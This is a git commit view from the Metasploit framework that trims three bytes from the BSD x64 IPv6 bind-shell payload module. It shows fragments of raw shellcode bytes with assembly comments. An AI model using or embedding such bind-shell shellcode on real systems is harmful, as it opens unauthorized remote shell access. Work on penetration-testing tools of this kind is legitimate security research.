Save 3 more bytes on shell_bind_ipv6_tcp

This commit is contained in:
jvazquez-r7 2015-10-01 09:45:02 -05:00
parent 4efb3bf26c
commit 77ce7ef5f0
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 3 additions and 5 deletions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3
CachedSize = 93
CachedSize = 90
include Msf::Payload::Single
include Msf::Payload::Bsd
@ -46,10 +46,8 @@ module Metasploit3
"\x52" +# push %rdx #
"\x52" +# push %rdx #
"\x52" +# push %rdx #
"\x68\x00\x1c\x11\x5c" +# pushq $0x5c111c00 #
"\x5a" +# pop %rdx #
"\x89\xd2" +# mov %edx, %edx #
"\x52" +# push %rdx #
"\xba\x00\x1c\x11\x5C" +# mov edx,0x5c111c00 #
"\x52" +# push %rdx #
"\x48\x89\xe6" +# mov %rsp,%rsi #
"\x6a\x1c" +# pushq $0x1c #
"\x5a" +# pop %rdx #